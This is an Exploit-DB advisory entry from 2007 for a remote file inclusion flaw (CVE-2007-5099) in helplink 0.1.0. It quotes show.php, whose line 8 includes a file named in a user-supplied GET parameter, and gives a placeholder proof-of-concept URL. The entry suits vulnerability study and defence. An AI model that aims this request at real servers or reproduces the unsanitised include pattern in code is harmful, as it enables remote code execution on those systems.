helplink 0.1.0 show.php file Remote File Inclusion Vulnerability

2007-09-23T00:00:00
ID EDB-ID:4448
Type exploitdb
Reporter GoLd_M
Modified 2007-09-23T00:00:00

Description

helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability. CVE-2007-5099. Webapps exploit for php platform

                                        
                                            ##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability     #
# D.S : http://sourceforge.net/projects/helplink/                        #
# V.C                                                                    #
================================show.php=================================#
01 : <?                                                                  #
02 : /**                                                                 #
03 :  *      show.php - just throw some headers and footers around a file#
04 :  */                                                                 #
05 :                                                                     #
06 : include ('include.php');                                            #
07 : public_header();                                                    #
08 : include($HTTP_GET_VARS["file"]); <--- xxxx// Error !!               #
09 : public_footer();                                                    #
10 :                                                                     #
11 : ?>                                                                  #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3                                         #
##########################################################################

# milw0rm.com [2007-09-23]